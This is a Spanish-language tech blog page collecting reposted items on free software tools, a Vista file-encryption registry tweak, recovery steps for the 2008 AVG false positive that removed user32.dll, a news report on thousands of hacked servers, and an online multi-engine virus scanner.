• Postear discusiones a las que podemos vincular archivos adjuntos.
• Añadir eventos en fechas que seleccionemos.

Hay que indicar que estas acciones serán vinculadas a los proyectos que hayamos creado o que crearemos posteriormente, y que además nos da la opción para compartirlas con otros contactos. Igualmente disponemos de un visor de proyectos, que nos permite ver de forma visual el resumen de la gestión de nuestros proyectos, y además, contamos con una guía de recursos.
Aclarar que algunas de las opciones sólo serán accesibles si disponemos de su versión de pago.
Un planteamiento diferente aunque persigue un objetivo común: la gestión de proyectos online de forma colaborativa de la manera más eficientemente posible.
Vía | TechCrunch
Enlace | Action Method
(visto en Genbeta)

AutoMen, el convertidor de vídeos minimalista

Un problema del que pecan la mayoría de las aplicaciones que nos sirven para convertir vídeos de un formato a otro es que suelen ser programas muy pesados además de bastante complicados de usar para la mayoría de los usuarios de a pie.
AutoMen viene un poco a solucionar este pequeño problema. Por un lado es una aplicación que no requiere instalación y sólo ocupa 10MB y por otro que no tiene demasiadas opciones además de tenerlas bien especificadas. Podríamos decir que casi es la aplicación definitiva, aunque tampoco es para tanto.
AutoMen tiene lo que tiene que tener un conversor de vídeos, por un lado podremos elegir el codec de salida, si queremos que el archivo resultante esté o no redimensionado, el tamaño en MB del archivo final, la calidad del audio y finalmente como queremos que sea la conversión. En este último punto podremos elegir entre varios perfiles, dependiendo de la calidad final que queramos obtener en el vídeo resultante, aunque depende del codec habrá más o menos perfiles.


En la pestaña de opciones avanzadas encontramos lo que propiamente el nombre de la pestaña indica, opciones avanzadas. Aquí podremos elegir de que manera queremos que se haga el redimensionado del archivo final, el tamaño de los volúmenes resultantes que queremos obtener en MB si es que queremos obtener el vídeo en volúmenes, configurar la compresión del audio para obtener un mejor resultado o introducir directamente el bitrate al que queremos que comprima el vídeo (para hacer esto previamente tendremos que usar una calculadora de bitrate).
AutoMen permite ir guardando los trabajos en una cola para, cuando estemos preparados y tengamos todos listos, lanzarlos. La aplicación es completamente gratuita, funciona con Windows y está en inglés.
Vía | Freeware Genius
Descarga | AutoMen
(visto en Genbeta)

Si necesitas Administración y seguimiento...

Si necesitas que una empresa administre y de seguimiento a tus sistemas y equipos informáticos en la región de Oaxaca-México, entonces da clic sobre la imagen.

Cifra tus archivos fácilmente en Windows Vista

Por lo general, la mayoría de nosotros tenemos en nuestro disco duro archivos que son privados, y que por algún motivo, no podemos permitir que los otros usuarios de nuestro PC los vean/modifiquen. Esto puede volverse especialmente peligroso en Vista, en donde la búsqueda instantánea, por defecto, no oculta los archivos de los otros usuarios. Es por eso que hoy os traemos un truco para cifrar los archivos de forma más sencilla, agregando una opción al menú contextual que nos permita prohibir a los otros usuarios acceder a nuestros ficheros.
Para ello debemos ir al Registro de Windows y navegar hasta encontrar la siguiente ruta:

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced

Una vez allí, creamos un valor DWORD de 32-bits, al que nombraremos EncryptionContextMenu y le asignaremos el valor 1. Para que el cambio tenga efecto, debemos reiniciar el sistema. Después de ello, deberíamos ver la opción Cifrar cada vez que hagamos clic en un archivo o carpeta con el botón derecho.
También podemos descargar este archivo ZIP. Extraemos su contenido, y luego, para agregar la encriptación al menú contextual, abrimos el archivo EnableRightClickEncryptFiles.reg. En cambio, para eliminar la opción, hacemos doble clic en el fichero DisableRightClickEncryptFiles.reg, el que obviamente también viene en el ZIP.
Vía | Windows Guides

(visto: en Genbeta)

Convierte imágenes en iconos en cuestión de segundos con ToYcon

Si alguna vez te ha dado por crear iconos para poder tener tu escritorio en Windows lo más personalizado posible sabrás que la mayoría de los programas que nos ayudan en este tema suelen ser muy pesados, con más opciones de las necesarias y encima de pago. Eso sin contar que otras muchas veces hemos tenido que recurrir a gigantes suites de diseño de las que, en el 90% de los casos, nos sobra la mitad de las características que nos ofrecen.
Gracias a ToYcon a partir de ahora, podremos crear iconos de una manera muy sencilla y sin necesidad, si quiera, de instalar la aplicación. ToYcon es como una especie de widget que se ejecuta en nuestro escritorio (y que podemos indicarle que esté siempre visible si así lo deseamos), que al arrastrarle una imagen encima nos devolverá la misma imagen pero en formato icono.


Así de sencillo. Aunque goza de unas cuantas opciones para obtener el resultado que estemos buscando. Por ejemplo tendremos que indicarle el formato de entrada del icono, entre PNG, JPG o GIF entre otros, el formato de salida, teniendo en este sentido una amplia gama de posibilidades o incluso el lenguaje, entre los que desgraciadamente no consta el español. Además como no, de poder indicarle donde queremos que nos guarde los iconos que genere.
La verdad es que me he llevado una grata sorpresa al usarlo ya que la aplicación es muy ligera y funciona a la perfección con las imágenes que he probado. La conversión la hace prácticamente al instante y el resultado es más que aceptable. La aplicación tiene licencia freeware y funciona con todos los Windows.
Vía | Freeware Genius
Descarga | ToYcon

(Visto en Genbeta)

Si necesitas algún proyecto...

Si te encuentras en el estado de Oaxaca-México y requieres apoyo en el ramo informático, visita nuestra página dando clic sobre la imagen.

AVG reporta al user32.dll como infectado en XP: Cómo repararlo

El día de ayer fue caótico para los usuarios de Windows XP que tienen instalado al antivirus AVG, sea en su versión gratis o profesional. Por un problema en la actualización de la base de datos, el antivirus confundió al archivo user32.dll, crítico para el funcionamiento de Windows, como infectado por un virus. Como consecuencia ha habido una gran cantidad de ordenadores escupiendo pantallas azules de la muerte de un día para el otro. Nosotros te explicamos cómo reparar esto.

El día que AVG voló por los aires

El horror: La pantalla azul clamando por el user32.dll

Un domingo para el olvido
Todo parecía indicar que se iba a tratar de un domingo cualquiera: Planear el almuerzo del mediodía, leer y ver algo sobre fútbol, y principalmente descansar. Pero algo no estaba bien cuando el móvil comenzó a sonar de manera desesperada, un grito de auxilio detrás de otro. En total recibí media docena de llamadas en un lapso poco menor a 40 minutos, todos mostrando el mismo patrón la misma condición: Pantalla azul, User32.dll, STOP 0x0135. Por un momento pensé: "¿Explotó Internet y no me enteré?" Era una coincidencia demasiado grande como para tratarse de casos aislados.

Un ejemplo del falso positivo sobre el user32.dll

Y no lo fueron, lamentablemente. Al parecer, la actualización del antivirus correspondiente al día 09/11 tenía alguna clase de error, el cual reportaba al archivo user32.dll como infectado por un virus. El supuesto bicharraco se llamaba PSW.Banker4.APSA, y la única manera de desinfectar al sistema era borrando el archivo o colocándolo en cuarentena. La parte complicada fue que al intentar borrarlo, AVG reportaba al usuario que se eliminaba dicho archivo, podía causar inestabilidad en el sistema. Bueno, el término "inestabilidad" se quedó miserablemente corto. Hoy lunes aún hay muchos ordenadores inutilizados debido a este desperfecto, con usuarios y administradores de sistema restaurando este archivo a diestra y siniestra.
Por suerte, reparar este problema no involucra tener que reinstalar todo el sistema operativo, pero dependiendo de la situación en la que te encuentres, deberás trabajar un poco más de lo normal. Hay dos métodos para hacer que el ordenador se recupere de la pantalla azul con el user32.dll, pero primero debes tener en cuenta una cosa: La gran mayoría de los casos se han reportado sobre Windows XP con el Service Pack 2. Si bien la actualización estaba defectuosa y puede haber afectado al SP3 también, debes saber de antemano qué versión del archivo necesitarás para restaurar, si del SP2 o del SP3. Nunca ha sido bueno mezclar versiones diferentes de bibliotecas (como por ejemplo colocar el user32.dll del SP2 sobre una instalación del SP3), por lo tanto no lo recomendamos.

Cómo restaurar la biblioteca

Método 1: Probando el Modo Seguro
Deberás descartar primero si el ordenador no se inicia en Modo Seguro a causa de este problema.  Los reportes han sido algo vagos en este aspecto, pero lo primero que recomendó AVG en sus foros es tratar de iniciar a Windows en Modo Seguro e intentar restaurar la biblioteca desde allí. En caso de que no inicie, salta directamente al método dos.

Puede que tu biblioteca haya quedado atrapada en el Virus Vault

a) Si el ordenador se inicia en Modo Seguro, el primer paso es comprobar si el user32.dll falsamente acusado se encuentra en el "Virus Vault" del AVG. Para ello, abre el AVG y ve al Virus Vault. Si allí aparece una entrada indicando que el archivo user32.dll ha sido infectado, selecciónalo y escoge la opción Restore. Una vez que hayas hecho eso, reinicia el ordenador y lo primero que debes hacer es actualizar en antivirus, ignorando cualquier advertencia de AVG sobre el user32.dll. La nueva base de datos ya tiene este inconveniente corregido y tras la actualización no tendrás más problemas.

Un ejemplo de respaldo del user32.dll a punto de ser copiado de regreso

b) Si no encuentras ninguna entrada en el Virus Vault, eso significa que el archivo fue eliminado directamente. Para restaurarlo, deberás revisar la carpeta llamada "dllcache" dentro de C:\Windows\system32, por si hay una copia de seguridad allí. Si la hay, entonces deberás copiar (no mover, copiar) este archivo de regreso a C:\Windows\system32, para restaurar su funcionalidad. Una vez que hayas hecho eso, reinicia y actualiza en antivirus. Repetimos: No demores la actualización, aplícala de inmediato.
c) En caso de que no exista una copia de la biblioteca en la carpeta dllcache, deberás adquirirla de una instalación funcional de XP. Recuerda que la versión debe igualar el tipo de Service Pack que esté instalado en tu ordenador. El mejor lugar para buscar dicha copia es en el disco de instalación de Windows XP, pero existen en Internet varios sitios que almacenan copias de dichas bibliotecas. Por las dudas, nosotros dejaremos aquí dos enlaces temporales para las versiones del SP2 (clic aquí) y el SP3 (clic aquí). El resto es como en el paso b.

Visitando la consola

La pantalla de instalación de XP te dará acceso a la consola

Método 2: El peor escenario
Bien, has intentado iniciar en Modo Seguro pero Windows se ha rehusado completamente. El punto principal sigue siendo el mismo: Debes colocar una copia de user32.dll de acuerdo a tu service pack dentro de la carpeta system32, sea como sea. Si tienes el disco de instalación de Windows XP, entonces podrás usar la Consola de Recuperación. Inserta el CD en el ordenador e inicia desde allí. Verás la clásica pantalla de instalación de Windows, pero en vez de presionar Intro para instalar, deberás presionar la tecla R para invocar la consola.

Escoge la instalación y escribe la contraseña si es necesario

Confirma la instalación de Windows que deseas explorar (escribiendo el número que aparece al lado y presionando Intro) y escribe la contraseña del administrador en caso de que la solicite (si no hay contraseña, sólo presiona Intro). Ahora debes tomar el archivo desde el disco de instalación y copiarlo de regreso al disco duro. Si sabes poco y nada de DOS entonces te recomendamos que estudies atentamente las imágenes que acompañan al artículo. Hemos escrito todos los comandos necesarios para que puedas llevar a buen puerto esta tarea. En resumen, debes ir a la unidad de discos ópticos (D: en nuestro caso) y copiar el archivo user32.dl_ (nota el guión bajo) a la raíz del disco duro (C: en nuestro ejemplo). Vuelve al disco, baja al directorio raíz (con el comando cd ..) y utiliza el comando Expand para convertir el user32.dl_ en user32.dll. Una vez expandido, copia el user32.dll en C:\Windows\system32 y C:\Windows\system32\dllcache, así quedará una copia por si las moscas. Para finalizar la operación escribe "exit" y confirma con Intro.

Debes copiar el archivo desde el CD al disco duro y expandirlo

Luego deberás copiarlo a los dos directorios indicados, finalizando con "exit"

Eso es todo. Recuerda que debes actualizar el antivirus apenas recuperes el sistema, de lo contrario te volverá loco/a con falsas alarmas. Si bien este artículo se enfoca en el problema del AVG, también te servirá como referencia para restaurar otros archivos de sistema en una situación similar. Puede que esto provoque cierto éxodo desde AVG hacia otros antivirus, pero lo cierto es que todos tienen algún grado de falsos positivos y siempre es preferible un antivirus paranoico a tener que lamentar una pérdida de información. ¡Buena suerte!

(visto en Neoteo)

Kaspersky: Miles de servers hackeados en un día

La empresa desarrolladora del antivirus Kaspersky anunció el hackeado de entre 2.000 y 10.000 servidores ubicados en Europa y Estados Unidos. Aunque actualmente no se sabe el origen del grupo de hackers se cree que son unos estudiantes universitarios de China. Luego del hackeo muchos usuarios eran redirigidos a un servidor donde se le instalaban spywares y troyanos, entre otras aplicaciones maliciosas.

La noticia fue anunciada por Kaspersky Lab.

Así como lees, Kaspersky anunció que en los últimos dos días cerca de 10.000 servidores, en Europa y Norteamérica, fueron hackeados por un grupo desconocido. Posiblemente estos hackers han utilizado cuentas comprometidas de los sitios web o también lo que se conoce como “SQL Injection Attack”, que consiste en hacer que el sitio ejecute comandos maliciosos sin darse cuenta.
Los hackers agregaron una línea de código JavaScript que redirige a las víctimas a un servidor en China. Este servidor puede enviar diferentes ataques, como errores en Firefox, Internet Explorer, Adobe Flash Player y ActiveX. Además, si el ordenador del usuario no tiene parches, el código malicioso podría instalar diferentes spywares y hasta troyanos, incluyendo un programa que está diseñado para robar contraseñas de World of Warcraft (o sea, sí, probablemente sean chinos).

Nunca se puede estar completamente a salvo en la web.

Sin embargo, aunque recientemente acaba de suceder en una alarmante cantidad, no es algo nuevo. Según Roger Thompson, jefe de investigaciones en AVG Technologies, estos ataques se han hecho bastante comunes en los últimos años. Además, juzgando por sus técnicas Thompson cree que provienen de estudiantes universitarios en China.

A principios de año un ataque similar puso en peligro más de 1.5 millones sitios web. Según Kaspersky, esta reciente ola de ataques da a entender que es bastante serio y habrá que hacer algo al respecto antes de que dañe a una cantidad mayor de usuarios.

Enlaces relacionados:
ComputerWorld

(visto en Neoteo)

NoVirusThanks, escanea online tus archivos en busca de código malicioso

Espero que ya todos hayamos aprendido la lección cada vez que recibimos cualquier tipo de archivo por cualquier medio digital, ya sea mediante correo electrónico, mediante mensajería instantánea, p2p o por donde sea. NoVirusThanks es otra de las aplicaciones web que merece que tengamos a mano para verificar que cualquier archivo que tengamos a nuestra disposición, no contenga ningún tipo de código malicioso.
NoVirusThanks se vale de 25 motores de escaneo online de virus: a-squared, Antivir, Avast, AVG, BitDefender, ClamAV, Comodo, Dr.Web, Ewido, F-Prot 6, G DATA, IkarusT3, Kaspersky, McAfee, NOD32 v3, Norman, Panda, QuickHeal, Solo Antivirus, Sophos, TrendMicro, VBA32 y VirusBuster. Como vemos, muchas son firmas ya muy conocidas por nosotros.


Lo único que tenemos que hacer es tener preparado nuestro archivo, teniendo en cuenta que éste no deberá de superar los 20 MB de límite máximo, además de algo de paciencia a la espera de que nuestro archivo, una vez subido, pueda ser procesado.
Una vez escaneado, nos dará un informe. En él, nos dará un enlace específico al mismo, además de la información del propio archivo y de los resultados obtenidos por cada uno de los 25 motores.
Además de escanear los archivos que subamos, disponemos de un buscador de claves Hash MD5 y de un directorio de programas propios freeware relacionados con la seguridad. Todos estos programas son para el sistema operativo Windows en general.
Una herramienta online más a tener en cuenta ante la duda sobre cualquier archivo en concreto, contando con la ventana no sólo de la verificación de los 25 motores de escaneo online en busca de código malicioso, sino además, de que las firmas son actualizadas cada seis horas
Vía | Maestro Alberto
Enlace | Novirusthanks

(visto en Genbeta)

Congregar, organizando eventos en las mejores fechas para todos

A la hora de organizar un evento, uno de los factores a tener en cuenta es que la fecha elegida sea una fecha que venga bien, sino a todos, a la mayoría de los posibles asistentes. Es por ello que existe Congregar, una sencilla aplicación disponible en la web que nos posibilita la consulta pública a nuestros posibles asistentes acerca de qué fechas de las propuestas les vienen mejor.
El procedimiento es muy sencillo, ya que no hay necesidad de registros de usuarios. Simplemente tenemos que indicar nuestro nombre y dirección de correo electrónico, título y descripción, y además nos encontramos con un calendario. En éste seleccionaremos los posibles días para la celebración de nuestro evento. Si creemos que ya tenemos todos los datos correctos en plena previsualización, creamos la encuesta.


Nuestra encuesta dispondrá de un enlace, que enviaremos a los posibles asistentes por diversos medios, para que éstos indiquen sus preferencias sobre los días propuestos. Sobre cada día indicarán su posibilidad de asistencia o no, además de un simple comentario de forma opcional.

Una vez hayan participado todos, según vayamos viendo refrescando la página de la encuesta, será entonces cuando por nuestros propios medios determinemos el mejor día para la celebración de nuestro evento.
Sin duda, una ayuda para ponernos de acuerdo sobre las mejores fechas para nuestras celebraciones de eventos.
Vía | Web2Null
Enlace | Congregar
(visto en Genbeta)